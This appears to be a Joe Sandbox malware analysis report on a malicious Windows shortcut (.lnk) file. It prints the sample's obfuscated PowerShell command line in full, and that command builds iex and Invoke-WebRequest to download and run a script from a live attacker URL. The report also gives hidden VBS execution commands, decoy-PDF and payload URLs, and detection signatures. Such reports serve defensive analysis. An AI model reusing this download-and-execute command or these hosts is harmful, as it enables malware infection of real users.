Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FjfZ7uM8zh.lnk

Overview

General Information

Sample name:FjfZ7uM8zh.lnk
renamed because original name is a hash value
Original sample name:59d532293086dd82eeede4bd5f35902c8836b26d012891db2ee9f5b2056e76bb.lnk
Analysis ID:1578189
MD5:86f583992054521437321921a00e48c6
SHA1:36500c391de6bf1131e27de43f7bb9d96bd27d2c
SHA256:59d532293086dd82eeede4bd5f35902c8836b26d012891db2ee9f5b2056e76bb
Tags:185-236-228-9287-120-112-91lnkwww-al-rasikh-comuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Powershell download and execute
AI detected suspicious sample
Machine Learning detection for sample
Obfuscated command line found
Powershell creates an autostart link
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • powershell.exe (PID: 3020 cmdline: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${t8ispk} = $PSHOME;${*wff6sn.} = ${t8ispk}[+52 -53 +1] + ${t8ispk}[-11 +2] + 'A' + ${t8ispk}[-66 +55];${wna.} = $([TYPE]${*wff6sn.});${*.hqpoqw.} = ${wna.}::ToString(+79 -1 -5)+${wna.}::ToString(+79 -1 -5 -4)+${wna.}::ToString(+79 +30 -10 +21);&(${*.hqpoqw.})(&(${*.hqpoqw.})(${t8ispk}[+52 -53 +1]+'u'+${t8ispk}[-66 +55]+${t8ispk}[-61 +55]+' https://www.al-rasikh.com/mk/neat.txt -UseBasicParsing')) MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5836 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 5852 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 7204 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 7396 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1644,i,621958559739695551,17562873366467030147,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 7272 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3020JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_3020.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${t8ispk} = $PSHOME;${*wff6sn.} = ${t8ispk}[+52 -53 +1] + ${t8ispk}[-11 +2] + 'A' + ${t8ispk}[-66 +55];${wna.} = $([TYPE]${*wff6sn.});${*.hqpoqw.} = ${wna.}::ToString(+79 -1 -5)+${wna.}::ToString(+79 -1 -5 -4)+${wna.}::ToString(+79 +30 -10 +21);&(${*.hqpoqw.})(&(${*.hqpoqw.})(${t8ispk}[+52 -53 +1]+'u'+${t8ispk}[-66 +55]+${t8ispk}[-61 +55]+' https://www.al-rasikh.com/mk/neat.txt -UseBasicParsing')), CommandLine: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${t8ispk} = $PSHOME;${*wff6sn.} = ${t8ispk}[+52 -53 +1] + ${t8ispk}[-11 +2] + 'A' + ${t8ispk}[-66 +55];${wna.} = $([TYPE]${*wff6sn.});${*.hqpoqw.} = ${wna.}::ToString(+79 -1 -5)+${wna.}::ToString(+79 -1 -5 -4)+${wna.}::ToString(+79 +30 -10 +21);&(${*.hqpoqw.})(&(${*.hqpoqw.})(${t8ispk}[+52 -53 +1]+'u'+${t8ispk}[-66 +55]+${t8ispk}[-61 +55]+' https://www.al-rasikh.com/mk/neat.txt -UseBasicParsing')), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${t8ispk} = $PSHOME;${*wff6sn.} = ${t8ispk}[+52 -53 +1] + ${t8ispk}[-11 +2] + 'A' + ${t8ispk}[-66 +55];${wna.} = $([TYPE]${*wff6sn.});${*.hqpoqw.} = ${wna.}::ToString(+79 -1 -5)+${wna.}::ToString(+79 -1 -5 -4)+${wna.}::ToString(+79 +30 -10 +21);&(${*.hqpoqw.})(&(${*.hqpoqw.})(${t8ispk}[+52 -53 +1]+'u'+${t8ispk}[-66 +55]+${t8ispk}[-61 +55]+' https://www.al-rasikh.com/mk/neat.txt -UseBasicParsing')), ProcessId: 3020, ProcessName: powershell.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${t8ispk} = $PSHOME;${*wff6sn.} = ${t8ispk}[+52 -53 +1] + ${t8ispk}[-11 +2] + 'A' + ${t8ispk}[-66 +55];${wna.} = $([TYPE]${*wff6sn.});${*.hqpoqw.} = ${wna.}::ToString(+79 -1 -5)+${wna.}::ToString(+79 -1 -5 -4)+${wna.}::ToString(+79 +30 -10 +21);&(${*.hqpoqw.})(&(${*.hqpoqw.})(${t8ispk}[+52 -53 +1]+'u'+${t8ispk}[-66 +55]+${t8ispk}[-61 +55]+' https://www.al-rasikh.com/mk/neat.txt -UseBasicParsing')), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3020, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'", ProcessId: 5836, ProcessName: powershell.exe
      Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3020, TargetFilename: C:\Users\Public\dmb.vbs
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3020, TargetFilename: C:\Users\Public\dmb.vbs
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${t8ispk} = $PSHOME;${*wff6sn.} = ${t8ispk}[+52 -53 +1] + ${t8ispk}[-11 +2] + 'A' + ${t8ispk}[-66 +55];${wna.} = $([TYPE]${*wff6sn.});${*.hqpoqw.} = ${wna.}::ToString(+79 -1 -5)+${wna.}::ToString(+79 -1 -5 -4)+${wna.}::ToString(+79 +30 -10 +21);&(${*.hqpoqw.})(&(${*.hqpoqw.})(${t8ispk}[+52 -53 +1]+'u'+${t8ispk}[-66 +55]+${t8ispk}[-61 +55]+' https://www.al-rasikh.com/mk/neat.txt -UseBasicParsing')), CommandLine: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${t8ispk} = $PSHOME;${*wff6sn.} = ${t8ispk}[+52 -53 +1] + ${t8ispk}[-11 +2] + 'A' + ${t8ispk}[-66 +55];${wna.} = $([TYPE]${*wff6sn.});${*.hqpoqw.} = ${wna.}::ToString(+79 -1 -5)+${wna.}::ToString(+79 -1 -5 -4)+${wna.}::ToString(+79 +30 -10 +21);&(${*.hqpoqw.})(&(${*.hqpoqw.})(${t8ispk}[+52 -53 +1]+'u'+${t8ispk}[-66 +55]+${t8ispk}[-61 +55]+' https://www.al-rasikh.com/mk/neat.txt -UseBasicParsing')), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${t8ispk} = $PSHOME;${*wff6sn.} = ${t8ispk}[+52 -53 +1] + ${t8ispk}[-11 +2] + 'A' + ${t8ispk}[-66 +55];${wna.} = $([TYPE]${*wff6sn.});${*.hqpoqw.} = ${wna.}::ToString(+79 -1 -5)+${wna.}::ToString(+79 -1 -5 -4)+${wna.}::ToString(+79 +30 -10 +21);&(${*.hqpoqw.})(&(${*.hqpoqw.})(${t8ispk}[+52 -53 +1]+'u'+${t8ispk}[-66 +55]+${t8ispk}[-61 +55]+' https://www.al-rasikh.com/mk/neat.txt -UseBasicParsing')), ProcessId: 3020, ProcessName: powershell.exe
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7272, ProcessName: svchost.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: FjfZ7uM8zh.lnkAvira: detected
      Source: FjfZ7uM8zh.lnkVirustotal: Detection: 24%Perma Link
      Source: FjfZ7uM8zh.lnkReversingLabs: Detection: 28%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
      Source: FjfZ7uM8zh.lnkJoe Sandbox ML: detected
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.8:49705 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.8:49706 version: TLS 1.2
      Source: Binary string: \mscorlib.pdbpdblib.pdbu source: powershell.exe, 00000001.00000002.1710540369.000001512B97D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1613639617.000001511151A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbe35 source: powershell.exe, 00000001.00000002.1710540369.000001512B97D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1613639617.000001511151A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1710540369.000001512B8FA000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000003.00000002.1533236480.00000217BF569000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb source: powershell.exe, 00000001.00000002.1710540369.000001512B97D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1533236480.00000217BF50B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb5 source: powershell.exe, 00000001.00000002.1710540369.000001512B97D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000001.00000002.1710540369.000001512B92F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb} source: powershell.exe, 00000001.00000002.1710540369.000001512B92F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000001.00000002.1710540369.000001512B97D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1533236480.00000217BF569000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000001.00000002.1710540369.000001512B92F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbG source: powershell.exe, 00000001.00000002.1710540369.000001512B97D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ll\mscorlib.pdb source: powershell.exe, 00000001.00000002.1710540369.000001512B97D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.1613639617.000001511151A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000001.00000002.1710540369.000001512B92F000.00000004.00000020.00020000.00000000.sdmp
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 203.175.174.69 203.175.174.69
      Source: Joe Sandbox ViewIP Address: 107.161.23.150 107.161.23.150
      Source: Joe Sandbox ViewASN Name: RAMNODEUS RAMNODEUS
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: global trafficHTTP traffic detected: GET /mk/neat.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.al-rasikh.comConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /mk/neat.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.al-rasikh.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.al-rasikh.com
      Source: global trafficDNS traffic detected: DNS query: www.astenterprises.com.pk
      Source: global trafficDNS traffic detected: DNS query: www.bluemaxxlaser.com
      Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 10:56:27 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: powershell.exe, 00000001.00000002.1621793505.0000015114BAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://al-rasikh.com
      Source: powershell.exe, 00000001.00000002.1621793505.0000015115463000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://astenterprises.com.pk
      Source: svchost.exe, 00000007.00000002.2732096738.0000023873400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: 77EC63BDA74BD0D0E0426DC8F80085060.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000001.00000002.1698340520.0000015123573000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1698340520.00000151236B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000001.00000002.1621793505.0000015113732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000001.00000002.1621793505.0000015113501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530575116.00000217A74AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000001.00000002.1621793505.0000015114BAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.al-rasikh.com
      Source: powershell.exe, 00000001.00000002.1621793505.0000015113732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000001.00000002.1621793505.0000015115463000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.astenterprises.com.pk
      Source: powershell.exe, 00000001.00000002.1621793505.0000015114C2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blud1dmaxxlasd1dr.com/ms/ms.
      Source: powershell.exe, 00000001.00000002.1621793505.0000015114BDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blud1dmaxxlasd1dr.com/ms/ms.vbs
      Source: powershell.exe, 00000001.00000002.1621793505.0000015114C2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blud1dmaxxlasd1dr.com/ms/ms.vbsX
      Source: powershell.exe, 00000001.00000002.1621793505.00000151154D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com
      Source: powershell.exe, 00000001.00000002.1621793505.00000151154D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com/ms/ms.vbs
      Source: 2D85F72862B55C4EADD9E66E06947F3D0.6.drString found in binary or memory: http://x1.i.lencr.org/
      Source: powershell.exe, 00000001.00000002.1621793505.0000015113501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530575116.00000217A74F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530575116.00000217A74E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000001.00000002.1698340520.00000151236B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000001.00000002.1698340520.00000151236B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000001.00000002.1698340520.00000151236B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
      Source: svchost.exe, 00000007.00000003.1593761579.0000023873350000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
      Source: powershell.exe, 00000001.00000002.1621793505.0000015113732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000001.00000002.1621793505.0000015114132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000001.00000002.1698340520.0000015123573000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1698340520.00000151236B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000001.00000002.1621793505.0000015114B32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.al-rasikh.com
      Source: powershell.exe, 00000001.00000002.1621793505.0000015113732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.al-rasikh.com/mk/nea
      Source: powershell.exe, 00000001.00000002.1621793505.0000015114B32000.00000004.00000800.00020000.00000000.sdmp, FjfZ7uM8zh.lnkString found in binary or memory: https://www.al-rasikh.com/mk/neat.txt
      Source: powershell.exe, 00000001.00000002.1621087749.00000151117D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1613639617.00000151114E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1708575138.000001512B644000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1621232451.0000015112E10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1613942378.0000015111557000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1710540369.000001512B8B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.al-rasikh.com/mk/neat.txt-UseBasicParsing
      Source: powershell.exe, 00000001.00000002.1621793505.0000015115372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astd1dntd1drprisd1ds.com.pk/ms/List%20of%20rd1dquird1dd%20itd1dms%20and%20sd1drvicd1ds.p
      Source: powershell.exe, 00000001.00000002.1621793505.0000015115372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk
      Source: powershell.exe, 00000001.00000002.1621793505.0000015115372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf8
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.8:49705 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.8:49706 version: TLS 1.2

      System Summary

      barindex
      Source: FjfZ7uM8zh.lnkLNK file: ${t8ispk} = $PSHOME;${*wff6sn.} = ${t8ispk}[+52 -53 +1] + ${t8ispk}[-11 +2] + 'A' + ${t8ispk}[-66 +55];${wna.} = $([TYPE]${*wff6sn.});${*.hqpoqw.} = ${wna.}::ToString(+79 -1 -5)+${wna.}::ToString(+79 -1 -5 -4)+${wna.}::ToString(+79 +30 -10 +21);&(${*.hqpoqw.})(&(${*.hqpoqw.})(${t8ispk}[+52 -53 +1]+'u'+${t8ispk}[-66 +55]+${t8ispk}[-61 +55]+' https://www.al-rasikh.com/mk/neat.txt -UseBasicParsing'))
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4B082F091_2_00007FFB4B082F09
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4B0834A51_2_00007FFB4B0834A5
      Source: classification engineClassification label: mal100.evad.winLNK@20/57@6/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\List of Required items and services.pdfJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25zpwdnn.shh.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'"
